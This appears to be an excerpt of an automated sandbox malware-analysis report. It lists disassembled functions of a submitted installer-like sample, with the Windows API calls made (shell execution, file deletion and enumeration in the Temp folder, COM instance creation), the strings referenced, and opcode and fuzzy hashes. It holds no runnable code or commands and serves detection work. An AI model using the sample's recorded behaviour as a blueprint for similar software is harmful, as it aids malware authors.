                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                      • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                                                                                      • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00405B3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 587946157-0
                                                                                                                                                                                                                                      • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                                                                                                                                      • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                                                                      • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                                                                      • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                                                                      • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00403A28,?), ref: 00403AE7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: f6c28f5574ac8d83da97f56e868f3fb7eedea34588f0df7261564807e3161c24
                                                                                                                                                                                                                                      • Instruction ID: d4db8dbaf33ff22f2ff991163c220eb3cd6c997f56162562831ac65c0e81f35c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6c28f5574ac8d83da97f56e868f3fb7eedea34588f0df7261564807e3161c24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15C01230504B0056D574AFB99E4FA053A649B4573DB600729B0F8B40F1CF7C5699995D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004049A3
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
                                                                                                                                                                                                                                        • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                                                                                                                                                                                                                                        • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                                                                                        • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                                                                                        • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                                                                                        • Part of subcall function 0040678E: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                                                                                                                                                                                                                        • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                                                                                        • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                                                                                        • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: : Completed$A
                                                                                                                                                                                                                                      • API String ID: 2624150263-4013017881
                                                                                                                                                                                                                                      • Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                                                                                      • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405D6C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                      • API String ID: 2035342205-1333152261
                                                                                                                                                                                                                                      • Opcode ID: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
                                                                                                                                                                                                                                      • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402269
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                      • API String ID: 542301482-3483070565
                                                                                                                                                                                                                                      • Opcode ID: b7224711a1886d81de964c301140e5375d6dc29c5df58188df5f48abd80a26da
                                                                                                                                                                                                                                      • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7224711a1886d81de964c301140e5375d6dc29c5df58188df5f48abd80a26da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
